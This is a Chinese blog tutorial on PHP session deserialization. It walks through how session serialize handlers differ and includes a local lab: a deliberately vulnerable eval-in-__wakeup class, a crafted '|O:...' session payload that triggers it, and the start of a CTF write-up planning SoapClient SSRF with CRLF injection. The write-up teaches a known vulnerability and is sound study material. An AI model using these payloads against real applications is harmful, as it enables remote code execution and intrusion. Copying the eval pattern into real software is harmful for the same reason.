

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/unjoke.jpg">
  <link rel="icon" href="/img/unjoke.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="unjoke">
  <meta name="keywords" content="">
  
    <meta name="description" content="先了解什么是session 默认看文章的都有反序列化基础，否则请看[PHP反序列化（一）](https:&#x2F;&#x2F;unjoke.github.io&#x2F;2024&#x2F;08&#x2F;18&#x2F;PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%88%E4%B8%80%EF%BC%89&#x2F;)  &lt;font style&#x3D;&quot;color:rgb(221, 17, 68);&amp;quo">
<meta property="og:type" content="article">
<meta property="og:title" content="session反序列化">
<meta property="og:url" content="http://example.com/2024/12/01/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="unjoke">
<meta property="og:description" content="先了解什么是session 默认看文章的都有反序列化基础，否则请看[PHP反序列化（一）](https:&#x2F;&#x2F;unjoke.github.io&#x2F;2024&#x2F;08&#x2F;18&#x2F;PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%88%E4%B8%80%EF%BC%89&#x2F;)  &lt;font style&#x3D;&quot;color:rgb(221, 17, 68);&amp;quo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/14.jpg">
<meta property="article:published_time" content="2024-12-01T11:52:35.381Z">
<meta property="article:modified_time" content="2024-12-01T11:55:09.206Z">
<meta property="article:author" content="unjoke">
<meta property="article:tag" content="web技术总结">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/14.jpg">
  
  
  
  <title>session反序列化 - unjoke</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>unjoke house</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/13.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="session反序列化"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-12-01 19:52" pubdate>
          2024年12月1日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          28 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">session反序列化</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="pfMJY">先了解什么是session</h1>
默认看文章的都有反序列化基础，否则请看[PHP反序列化（一）](https://unjoke.github.io/2024/08/18/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%88%E4%B8%80%EF%BC%89/)

<p><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;Session&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);">一般称为“会话控制“，简单来说就是是一种客户与网站&#x2F;服务器更为安全的对话方式。一旦开启了 </font><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;session&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);"> 会话，便可以在网站的任何页面使用或保持这个会话，从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同，这里仅讨论</font><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;PHP session&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);">机制。</font></p>
<blockquote>
<p><font style="color:rgb(127, 140, 147);">会话：就是客户端浏览器和服务器的一次数据交互</font></p>
<p><font style="color:rgb(127, 140, 147);">出现会话的原因：我们知道客户端浏览器访问网站使用的是http(https)协议,http协议是一种无状态的协议，意思就是说不会储存任何东西，每一次的请求都是没有关联的，这样做的好处就是速度快，但是现在就出来了一个问题，比如我们向login.php发送了一个登录请求，并完成了登录，但是由于http的无状态，这个登录只是在login.php上面进行了，但是并没有在index.php上面登录，那我们的登录是没有意义的，所以就产生了cookie，cookie是一个缓存用于一定时间的身份验证，在同一域名下面是全局的，所以说在同一域名下的页面都可以访问到cookie，这样http协议的无状态产生的问题就解决了，但是由于cookie保存在客户端浏览器，这样的话我们就可以去修改cookie，这样的话就很不安全，在这种情况下产生了session，session的本质和cookie一样，但是session保存在服务端。</font></p>
</blockquote>
<p><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;PHP session&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);">可以看做是一个特殊的变量，且该变量是用于存储关于用户会话的信息，或者更改用户会话的设置，需要注意的是，</font><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;PHP Session&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);"> 变量存储单一用户的信息，并且对于应用程序中的所有页面都是可用的，且其对应的具体 </font><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;session&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);"> 值会存储于服务器端，这也是与 </font><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;cookie&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);">的主要区别，所以</font><code>&lt;font style=&quot;color:rgb(221, 17, 68);&quot;&gt;seesion&lt;/font&gt;</code><font style="color:rgb(51, 51, 51);"> 的安全性相对较高。</font></p>
<h1 id="cVQuQ">session工作原理剖析</h1>
<h2 id="OnHsa">session工作机制</h2>
当我们开启一个会话时，php会尝试在请求中查找sessio_id,如果在请求中的cookie，GET,POST里面没有找到session_id,这个时候php会调用php_session_create_id函数创造一个新的会话并且在`http response`中通过`set-cookie`头部发送给客户端保存

<h2 id="Iq6SC">session_start()函数</h2>
这里解释一下`session`的创造过程，`session_statrt()`这个函数，这个函数的作用是开启会话，初始化`session`数据

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">Seesion_start</span>()函数会创建一个唯一的Session ID，并自动通过HTTP的响应头，将这个Session ID保存到客户端Cookie中。同时，也在服务器端创建一个以Session ID命名的文件，用于保存这个用户的会话信息。当同一个用户再次访问这个网站时，也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来，这时<span class="hljs-title function_ invoke__">Session_start</span>()函数就不会再去分配一个新的Session ID，而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件，将这之前为这个用户保存的会话信息读出，在当前脚本中应用，达到跟踪这个用户的目的<br></code></pre></td></tr></table></figure>

<p>刚才说过<code>session</code>的作用是开启会话，也就是打开<code>session</code>，也就是说如果我们想要使用<code>session</code>功能，可以使用<code>session_start</code>来开启，这个函数既不会成功也不会报错，它的作用是打开<code>Session</code>，并且随机生成一个32位的<code>session_id，session</code>的全部机制也是基于这个<code>session_id</code>，服务器就是通过这个唯一的<code>session_id</code>来区分出这是哪个用户访问的</p>
<h2 id="C20jb">session储存</h2>
上面说了session_id的产生，下面我们来看一下session的储存，测试payload

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;session_id(): &quot;</span>.<span class="hljs-title function_ invoke__">session_id</span>().<span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;COOKIE: &quot;</span>.<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&quot;PHPSESSID&quot;</span>];<br></code></pre></td></tr></table></figure>

<p>也是可以看到随机生成了一个<code>session_id</code></p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730424216526-aa463cdb-3a05-49b6-aa28-1cb1731dcdb1.png" srcset="/img/loading.gif" lazyload></p>
<p>并且被储存在网页的cookie里面，查看目录同样存在</p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730424499665-195441a5-ee17-476b-969c-f13d5c24e0b0.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到我们生成的session的储存名称是以sees_+sesion_id组成的</p>
<p>前面我们也说过session会保存在cookie中，那我们是否可以通过修改cookie中的phpsession来修改session_id呢？</p>
<p>尝试一下：</p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730424703319-df11d933-0ae6-4064-962f-9be2a66ffa3a.png" srcset="/img/loading.gif" lazyload></p>
<p>将他修改成<code>woaini</code>，看看目录是否被修改了</p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730424816547-dfd52c46-a3a5-4895-8419-68a6cd0dc0cf.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730424759584-9c6e62a7-f8c2-4985-80ea-3c1c6086d6a0.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到生成了一个全新的session_id，而不是修改原先文件，现在我们尝试写入新的文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;test1&#x27;</span>]=<span class="hljs-string">&#x27;coke&#x27;</span>;<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;test2&#x27;</span>]=<span class="hljs-string">&#x27;xiao mao lao di&#x27;</span>;<br><span class="hljs-keyword">echo</span><span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;session_id(): &quot;</span>.<span class="hljs-title function_ invoke__">session_id</span>().<span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;COOKIE: &quot;</span>.<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&quot;PHPSESSID&quot;</span>];<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730425124228-37854a9a-dfcb-420d-a266-3d927e5df687.png" srcset="/img/loading.gif" lazyload></p>
<p>文件有了内容，而且是序列化的内容，分析一下过程</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">就是HTTP请求一个页面后，如果用到开启session，会去读COOKIE中的PHPSESSID是否有，如果没有，则会新生成一个session_id，先存入COOKIE中的PHPSESSID中，再生成一个sess_前缀文件。当有写入<span class="hljs-variable">$_SESSION</span>的时候，就会往sess_文件里序列化写入数据。当读取到session变量的时候，先会读取COOKIE中的PHPSESSID，获得session_id，然后再去找这个sess_session_id文件，来获取对应的数据。由于默认的PHPSESSID是临时的会话，在浏览器关闭后就会消失，所以，当我们打开浏览器重新访问的时候，就会新生成session_id和sess_session_id这个文件<br></code></pre></td></tr></table></figure>

<h1 id="gufy1">session在php.ini配置</h1>
session的保存位置是由php.ini文件控制的，那我们接下来看一下php.ini中于session有关的配置

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">session.save_path：这是session文件的储存路径<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730425508439-619eff43-5bb5-4d76-b47c-94d0ed54c955.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">session.auto_start：这个开关是指定是否在请求开始时就自动启动一个会话，默认为Off；如果它为On的话，相当于就先执行了一个<span class="hljs-title function_ invoke__">session_start</span>()，会生成一个session_id，一般来说这个开关是不会打开的<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730425538846-a5b35c6d-3f9d-4f93-b898-4369e47eb797.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">session.save_handler：这个是设置用户自定义session存储的选项，默认是files，也就是以文件的形式来存储的<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730425580576-1982f3ac-a97e-447b-8476-06be56d28300.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">session.serialize_handler：这是最重要的部分，定义用来序列化/反序列化的处理器名字，默认使用php，还有其他引擎，且不同引擎的对应的session的存储方式不相同，默认是php<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730425625090-53e5d9e7-c66b-4e94-a185-3d545e9e082e.png" srcset="/img/loading.gif" lazyload></p>
<p>session.serialize_handler是定义序列化&#x2F;反序列化的处理器名字，我们可以看到我们测试环境的处理器是php，而在session文件中经过php处理器处理过的以”|”把键名和键值分开了，这就是php处理器的特性，下面我们来看一下序列化&#x2F;反序列化常用处理器得特性和作用</p>
<h2 id="kM1f3">session.serialize_handler处理器</h2>
| 处理器 | 对应储存格式 |
| --- | --- |
| php | 键名 ＋ 竖线 ＋ 经过 serialize() 函数反序列处理的值 |
| php_binary | 键名的长度对应的 ASCII 字符 ＋ 键名 ＋ 经过 serialize() 函数反序列处理的值 |
| php_serialize (php>=5.5.4) | 经过 serialize() 函数反序列处理的数组 |


<p>看看别人给出来的三个处理器的区别</p>
<h3 id="ngx29"><font style="color:#DF2A3F;">php</font></h3>
![](https://raw.githubusercontent.com/unjoke/imjoke/img/1730425834517-8ee55fe3-e546-4108-9f2d-743e643d8df4.png)

<h3 id="PpnAT"><font style="color:#DF2A3F;">php_binary</font></h3>
![](https://raw.githubusercontent.com/unjoke/imjoke/img/1730425823856-96487e78-29e8-461a-ac5d-7033d0cce9ab.png)

<h3 id="p0KBl"><font style="color:#DF2A3F;">php_serialize</font></h3>
![](https://raw.githubusercontent.com/unjoke/imjoke/img/1730425818362-4e88aa31-fcbf-49f1-b195-1bf8889cffb9.png)

<h1 id="eXHIF">session反序列化</h1>
重头戏来了！！！！！！

<p>session不需要unserialize()就能够进行反序列化，但是究竟是怎么进行反序列化呢？<br>我们来看一下session_start()函数的官方文档<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/function.session-start.php">PHP: Hypertext Preprocessor</a></p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730425986701-f79715fa-67c1-4073-8ff9-72a9e0cd3981.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到官方文档的一句话</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">PHP 会自动反序列化数据并且填充 <span class="hljs-variable">$_SESSION</span> 超级全局变量<br></code></pre></td></tr></table></figure>

<p>展示一下个人理解</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">倘若你重新提交了会话的id他会重新使用当前会话，并且将提之前sess文件里的内容反序列化填充到session里面<br></code></pre></td></tr></table></figure>

<p>既然这样那我们如果把序列化后的内容提前写入到sess文件中，然后刷新页面，就会调用read函数返回现有会话数据，php会把我们之前已经传入的数据进行反序列化操作，这样就会触发反序列化漏洞。</p>
<p>但是现在还有一个问题要解决，因为我们传入的是键值对，那么<code>session</code>序列化存储所用的处理器肯定也是将这个键值对写了进去，怎么才能让它正好反序列化到我们传入的内容。</p>
<p>这里就要用到我们上面介绍到的不同序列化处理器的特性，我们可以在我们传入的序列化内容前面加一个|,在<code>php_serialize</code>处理后会返回一个序列化后的数组，但是在使用php处理器会以竖线|作为一个分隔符，前面的为键名，后面的为键值，然后将键值进行反序列化操作，这样就能够实现我们session反序列化操作</p>
<h2 id="zZODU">看看本地测试</h2>
漏洞页面

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>, <span class="hljs-string">&#x27;php&#x27;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">unjoke</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;code);<br>    &#125;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>session传参页面</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>, <span class="hljs-string">&#x27;php_serialize&#x27;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;unjoke&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;unjoke&#x27;</span>]=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;unjoke&#x27;</span>];<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>传输<code>?unjoke=O:6:&quot;unjoke&quot;:1:&#123;s:4:&quot;code&quot;;s:10:&quot;phpinfo();&quot;;&#125;</code></p>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/42549390/1730427717720-b57b7913-5e9b-4b1d-8ed6-f535c9f3e84f.png" srcset="/img/loading.gif" lazyload></p>
<p>|之前的会被认定为键名，|之后会被认定为键值，所以<code>unjoke</code>被当成了一个字符，并不会触发反序列化</p>
<p>传入<code>?unjoke=|O:6:&quot;unjoke&quot;:1:&#123;s:4:&quot;code&quot;;s:10:&quot;phpinfo();&quot;;&#125;</code></p>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/42549390/1730427814400-2f9e6362-2e68-445d-86d8-57512e6db35e.png" srcset="/img/loading.gif" lazyload></p>
<p>这个时候键名不再是<code>unjoke</code>了，而是<code>a:1:&#123;s:6:&quot;unjoke&quot;;s:45:&quot;</code>，回到漏洞触发的代码块，可以看到反序列化漏洞成功触发</p>
<p><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1730428033387-753b38e6-d14a-411a-80b0-02e377d5c025.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="l5og6">题目试试水</h1>
<h2 id="z9DOI">bestphp's revenge</h2>
进来就是代码审计，注释版本

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">// 高亮显示当前文件的代码</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-comment">// 定义变量 $b 为字符串 &#x27;implode&#x27;</span><br><span class="hljs-variable">$b</span> = <span class="hljs-string">&#x27;implode&#x27;</span>;<br><span class="hljs-comment">// 使用 call_user_func 函数调用 $_GET[&#x27;f&#x27;] 作为函数名，并将 $_POST 作为参数传递</span><br><span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;f&#x27;</span>], <span class="hljs-variable">$_POST</span>);<br><span class="hljs-comment">//$_POST返回的是数组，解释器会将$_POST数组中的键转换为变量，例如post传参a=1，这个时候a就会被转化成$a</span><br><span class="hljs-comment">// 启动会话</span><br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-comment">// 如果 URL 中存在 &#x27;name&#x27; 参数，将其值存入会话变量 &#x27;name&#x27;</span><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;name&#x27;</span>])) &#123;<br>    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;name&#x27;</span>] = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;name&#x27;</span>];<br>&#125;<br><span class="hljs-comment">// 输出当前会话的所有变量</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-variable">$_SESSION</span>);<br><span class="hljs-comment">// 创建一个数组 $a，其中包含会话变量 &#x27;name&#x27; 的值（如果存在）和字符串 &#x27;welcome_to_the_lctf2018&#x27;</span><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">array</span>(<span class="hljs-title function_ invoke__">reset</span>(<span class="hljs-variable">$_SESSION</span>), <span class="hljs-string">&#x27;welcome_to_the_lctf2018&#x27;</span>);<br><span class="hljs-comment">// 使用 call_user_func 调用 implode 函数，将数组 $a 转换为字符串，reset() 函数用于将数组的内部指针重置到第一个元素，并返回该元素的值。</span><br><span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$b</span>, <span class="hljs-variable">$a</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>存在flag.php,访问flag.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php">only localhost can get flag!<span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;only localhost can get flag!&#x27;</span>;<br><span class="hljs-variable">$flag</span> = <span class="hljs-string">&#x27;LCTF&#123;*************************&#125;&#x27;</span>;<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&quot;REMOTE_ADDR&quot;</span>]===<span class="hljs-string">&quot;127.0.0.1&quot;</span>)&#123;<br>       <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;flag&#x27;</span>] = <span class="hljs-variable">$flag</span>;<br>   &#125;<br>only localhost can get flag!<br></code></pre></td></tr></table></figure>

<p>思路梳理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">思路就是利用SoapClient 类构造出ssrf的序列化字符串，然后利用call_user_func修改配置，造成序列化与反序列化引擎不同的漏洞，然后调用extract函数去变量覆盖，调用SoapClient类，从而触发__call方法，想直接在flag.php伪造ip肯定是不行的，我帮你们试过了<br></code></pre></td></tr></table></figure>

<p>由于<code>SoapClient</code>类的<code>__call</code>方法，当 <code>__call</code> 方法被触发后，它可以发送 HTTP 和 HTTPS 请求，我们就可以利用这个类来进行ssrf（结合<font style="color:rgb(77, 77, 77);">CRLF注入</font>），伪造脚本如下</p>
